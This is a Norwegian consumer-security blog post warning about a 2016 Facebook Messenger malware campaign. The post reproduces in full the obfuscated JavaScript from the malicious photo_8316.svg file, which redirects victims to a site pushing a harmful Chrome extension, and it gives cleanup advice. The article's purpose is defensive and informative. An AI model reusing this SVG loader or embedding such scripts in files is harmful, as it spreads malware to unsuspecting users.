Skip to content
Datahjelperne

Datahjelperne

Primary Menu
  • Datahjelperne Pluss
  • Artikkel
    • Artikler
    • Teknologi
    • Mobil og nettbrett
      • Mobil
        • Data tilbehør
        • Mobil tilbehør
      • Nettbrett
        • Nettbrett tilbehør
    • Nettverk
    • Foto og Video
    • App
    • Lyd og Bilde
    • Smartklokke
    • Konkurranse
    • Programvare
    • Crypto
    • Nytt
    • Kommentar
  • Svindel
    • Svindel
    • E-post svindel
    • Crypto svindel
    • Nettside svindel
    • SMS Svindel
    • Facebook svindel
    • telefon svindel
  • Min Konto
  • Om Oss
  • Tips en venn – Vinn 1 million
  • Kontakt oss
  • Home
  • Artikler
  • Sikkerhet
  • Facebook foto chat virus

Facebook foto chat virus

Jørund Heimholt 20. november 2016

Del dette:

  • Twitter
  • Facebook
  • Skriv ut
  • Reddit
  • LinkedIn
  • Telegram
  • E-post
facebook

facebookNå begynner en ny type skadevare og spres på Facebook. Det starter med at noen som er infisert får en melding med en fil de må åpne. Jeg skal få analysert hele denne svindelen.

Jeg sier alltid at det ikke er virus før det motsatte er bevist. Det gjør jeg her også. Det første jeg gjør det er å analysere bildefilen photo_8316.svg. Jeg bruker virus total som er en gratis virusskanner motor på internett. Den er det google som har laget og her skanner du filer og linker fra internett med opptil 54 viruscanne motorer fra mange selskaper. Det jeg finner her er heller mindre god lesing.

skjermbilde

Som du ser så får jeg treff på 11 virusmotorer. Jeg tar en sjekk på Trojan JS. Nemucod. CX Den har hatt stor spredning før, men er vel på vei opp igjen nå.  Det som skjer når du trykker på bildefilen. Så kjøres det ett javascript på din pc. Det er all koden som du ser under her:

 

<!DOCTYPE svg PUBLIC “-//W3C//DTD SVG 1.1//EN”
“http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd”>
<svg version=”1.1″ xmlns=”http://www.w3.org/2000/svg”>
<circle cx=”250″ cy=”250″ r=”50″ fill=”red” />
<script type=”text/javascript”><![CDATA[
function jzvxu(ovdyen,xbcat,emgls){
var qxfbj = “ep.Z/1Jzj9kgENc_XKByPdbRsiM85YU3fSnTHAx4lv=r07OVt:hC?FL6muoI2GDa”;
var ljbid = [“oj5\/1c09:ze.RU_B6ZIECgbV3lkTiKfM8JAvYdL=FmNSuGhHs7?OxDy42ntaprXP”,”oKaGJYVTkfbvx1.sUrDL6tMndjSH:2gP08O=Zcpu359z_Iy?ihAeN7\/C4lRFBmEX”,”rXJgPI2C6\/G=:_b5AO41hBNf8ZsoLMDY90V3?UaxSmHtiEjnl.kezp7TcvyudRFK”,”ipjfYsGd326HzUurB1\/at?AkCV0TSlcg8hnI5R9ZPvM_Db7.L4EymONXKJxo=:eF”,”=PN4ec5gAuymXlfhSJ7H?sjRFL0Mki3ETrnGO8b6pCBUo_9KV1vZz.2:dItxD\/Ya”,”L29_cyi4zp5:0ZM=7AKBaf3Ft1sPIebh\/SRvEYOmJoVD6xdlCH?rgGnN8kuTXUj.”,”03bEzUjT4IRh\/pu.t2P7JKHiX8ny65LldYFmG?O=V9gaoMAe:Sr1f_ZcvBDkNxCs”];
var xzdvdq = “”;
var bszclj = 0;
while(ljbid[bszclj]){
bszclj++;
}
var synjv = 0;
while(ovdyen[synjv]){
var dloriu = 0;
var newpn = -1;
while(qxfbj[dloriu]){
if(qxfbj[dloriu]== ovdyen[synjv]){
newpn = dloriu;
break;
}
dloriu++;
}
if(newpn >= 0){
var dlkzpk = 0;
var xltllh = -1;
while(ljbid[synjv%bszclj][dlkzpk]){
if(ljbid[synjv%bszclj][dlkzpk]== ovdyen[synjv]){
xltllh = dlkzpk;
break;
}
dlkzpk++;
}
xzdvdq += qxfbj[xltllh];
}else{
xzdvdq += ovdyen[synjv];
}
synjv++;
}
var phiav = “”;
for(vmlrh=xbcat;vmlrh<xzdvdq.length;vmlrh++){
phiav += xzdvdq[vmlrh];
}
xzdvdq = phiav;
return xzdvdq;
}
var pritrj = window;
var gulrp = jzvxu(“tlN_j/4liyp”,8,false);
var dlmgvp = jzvxu(“sRN?U?Vt.KLLuF”,6,true);
var aebvqq = jzvxu(“wv=EULd”,3,false);
pritrj[gulrp][dlmgvp][aebvqq]= jzvxu(“oiGKvC:jhPYtMBFl9JvkRtaZLI2bjwPpv2zszvCV93?K”,4,true);
]]></script>
</svg>

 

Da blir alt dette over installert, men det stopper ikke der. Her er også mye av koden kryptert og det er uleselig. Når du har kjørt filen så kommer du videre til en nettside som ber dere installere en plugin i Google Chrome.

skjermbilde

Når du installerer denne pluginen i Google Chrome er du med på å spre dette videre på Facebook. Dette er en av de verre Facebook virus jeg har vært borti til nå. Video vil du aldri få se desverre.

Vanligvis så kan man fjerne en plugin i Google Chrome også er alt fint, men ikke her.

  1. Her får du flere virus og trojanere installert på pc.
  2. Her får du også installert skadevare i Chrome.

Så her må du bruke flere programmer for få dette fjernet. Jeg anbefaler antivirus og antimalware.

  • Avast antivirus
  • Malware Bytes free

Du må også tilbakestille Google Chrome for å renske opp i nettleseren. Det gjøres under avanserte instillinger.

For å bli infisert så må du gjøre følgene:

  1. Trykke på filen i melding
  2. Kjøre den
  3. Få installert virus på pc
  4. Gå til falsk videoside i Google Chrome
  5. Installere Chrome utvidelse

Så dette hopper ikke inn i pc`en av seg selv. Her  tar nyskjerrigheten din overhånd.

Men dette er mer farlige saker. Har du fått dette på din pc og facebook konto.

Bytt passord på Facebook konto og scann pc for skadevare med en gang.

Jeg har kun fått testet dette viruset på Windows 10. Så jeg vet ikke åssen det spres på mac, iphone eller andre windows varianter.


For andre artikler se her, også sjekk ut oss på sosiale medier Facebook og Twitter.

Relatert

Continue Reading

Previous: SVINDEL – Svindel på spillplattformen Steam
Next: SVINDEL – Samsung Facebook svindel
  • Om Oss
  • Salgsvilkår
  • Personvernerklæring
  • Tips en venn – Vinn 1 million
Copyright © All rights reserved. | MoreNews by AF themes.
Vi bruker informasjonskapsler for å forbedre din opplevelse, analysere bruk og til markedsføring. Les mer i vår personvernerklæring, og endre innstillinger når som helst.
Personvernerklæring

Your privacy settings

We and our partners use information collected through cookies and similar technologies to improve your experience on our site, analyse how you use it and for marketing purposes. Because we respect your right to privacy, you can choose not to allow some types of cookies. However, blocking some types of cookies may impact your experience of the site and the services we are able to offer. In some cases, data obtained from cookies is shared with third parties for analytics or marketing reasons. You can exercise your right to opt-out of that sharing at any time by disabling cookies.
Personvernerklæring
Allow all

Manage Consent Preferences

Necessary
Always ON
These cookies and scripts are necessary for the website to function and cannot be switched off. Theyare usually only set in response to actions made by you which amount to a request for services, suchas setting your privacy preferences, logging in or filling in forms. You can set your browser to block oralert you about these cookies, but some parts of the site will not then work. These cookies do notstore any personally identifiable information.
Analytics
These cookies and scripts allow us to count visits and traffic sources, so we can measure and improve the performance of our site. They help us know which pages are the most and least popular and see how visitors move around the site. All information these cookies collect is aggregated and therefore anonymous. If you do not allow these cookies and scripts, we will not know when you have visited our site.
Embedded Videos
These cookies and scripts may be set through our site by external video hosting services like YouTube or Vimeo. They may be used to deliver video content on our website. It’s possible for the video provider to build a profile of your interests and show you relevant adverts on this or other websites. They do not store directly personal information, but are based on uniquely identifying your browser and internet device. If you do not allow these cookies or scripts it is possible that embedded video will not function as expected.
Google Fonts
Google Fonts is a font embedding service library. Google Fonts are stored on Google's CDN. The Google Fonts API is designed to limit the collection, storage, and use of end-user data to only what is needed to serve fonts efficiently. Use of Google Fonts API is unauthenticated. No cookies are sent by website visitors to the Google Fonts API. Requests to the Google Fonts API are made to resource-specific domains, such as fonts.googleapis.com or fonts.gstatic.com. This means your font requests are separate from and don't contain any credentials you send to google.com while using other Google services that are authenticated, such as Gmail.
Marketing
These cookies and scripts may be set through our site by our advertising partners. They may be used by those companies to build a profile of your interests and show you relevant adverts on other sites. They do not store directly personal information, but are based on uniquely identifying your browser and internet device. If you do not allow these cookies and scripts, you will experience less targeted advertising.
Facebook Advanced Matching
Facebook Advanced Matching can improve ads attribution and conversion tracking. It can help us reach better-targeted custom audiences through our ads. When possible, we will share with Facebook hashed information like your name, phone, email, or address.
Facebook CAPI
Facebook Conversion API Events (CAPI) help us better understand how you interact with our websites. They allow us to measure the impact of our ads on the website's conversions and they improve ads targeting through custom audiences. When possible, we might share with Facebook information like name, email, phone, address.
Confirm my choices Allow all
 

Laster kommentarer...